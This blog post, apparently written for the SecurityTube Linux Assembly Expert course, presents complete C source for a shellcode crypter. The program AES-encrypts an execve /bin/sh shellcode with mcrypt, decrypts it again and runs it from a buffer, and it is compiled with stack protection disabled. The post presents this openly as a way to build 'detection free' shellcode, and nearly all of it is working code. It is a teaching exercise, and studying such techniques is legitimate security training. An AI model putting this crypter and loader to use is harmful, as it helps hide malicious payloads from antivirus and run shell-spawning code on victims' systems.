In this post, we will design a shellcode crypter which will encrypt the shellcode and then decrypt the encrypted shellcode and run it dynamically. The libraries we will be using for encryption will be mcrypt, and the shellcode encryption schema is Rijndael-128(AES). 

We will design the crypter in C programming language. The shellcode we will be using for this exercise will be an execve stack based shellcode. Following is the code of the crypter:

/*
Compile using the following command:
$gcc aes_128_crypter.c -o aes_128_crypter -lmcrypt -fno-stack-protector -z execstack
Author: Nipun Jaswal (SLAE-1080)
*/

#include <stdio.h>
#include <string.h>
#include <mcrypt.h>

int main()
{
// Shellcode execve-stack
unsigned char * shellcode = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
int shell_len = strlen(shellcode);

// Other Variables
char* i_vect = "AAAABBBBCCCCDDDD";
char *key = "wh4t1sloven0t1ng";
unsigned char buffer[32];
int count;

// Printing Unencrypted Shellcode
printf("\n[+] Shellcode Used:\n");
for ( count = 0; count < shell_len; count++)
{
printf("\\x%02x",shellcode[count]);
}

//Copy Shellcode on a 32 Byte Buffer
strncpy(buffer, shellcode, 32);

//Calling Encryption Function with Flag=0 , 32 is Length, 16 is Key Size
enc_dec(buffer, 32, i_vect, key,0);

//Printing Out Encrypted Shellcode Bytes
printf("\n\n[+] Encrypted Shellcode:\n");
for ( count = 0; count < 32; count++)
{
printf("\\x%02x",buffer[count]);
}

//Calling Decryption Function with Flag=1, 32 is the Length, 16 is Key Size
enc_dec(buffer, 32, i_vect, key,1);

//Printing Out Decrypted Shellcode Bytes
printf("\n\n[+] Decrypted Shellcode:\n");
for(count = 0; count < shell_len; count++)
{
printf("\\x%02x",buffer[count]);
}

//Calling Shellcode
printf("\n\nShellcode Length:  %d\n", strlen(buffer));
int (*ret)() = (int(*)())buffer;
ret();
return 0;
}
// Encryption Function
int enc_dec(void* buffer,int buffer_len,char* i_vect, char* key, int flag)
{
  // Mcrypt Object and Selecting the Crypto
  MCRYPT obj = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL);
  mcrypt_generic_init(obj, key, 16, i_vect);
  if(flag==0)
  {
  printf("\n\n[+]Running Encryption...");
  //Encrypting the Shellcode
  mcrypt_generic(obj, buffer, buffer_len);
  }
  else if(flag==1)
  {
  printf("\n\n[+]Running Decryption...");
  //Decrypting the Shellcode
  mdecrypt_generic(obj, buffer, buffer_len);
  }
  mcrypt_generic_deinit (obj);
  mcrypt_module_close(obj);
  return 0;
}

The enc_dec function accepts flag value and based on the value it performs either an encryption operation or decryption operation. Also, the length of the key for encryption and decryption is 16. On running the crypter, we get the following output:

We saw how we can create a basic crypter in C. We can build on these methods and combine the best of polymorphism, encoding, and encryption to create much more advanced and detection free shellcodes.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student-ID: SLAE-1080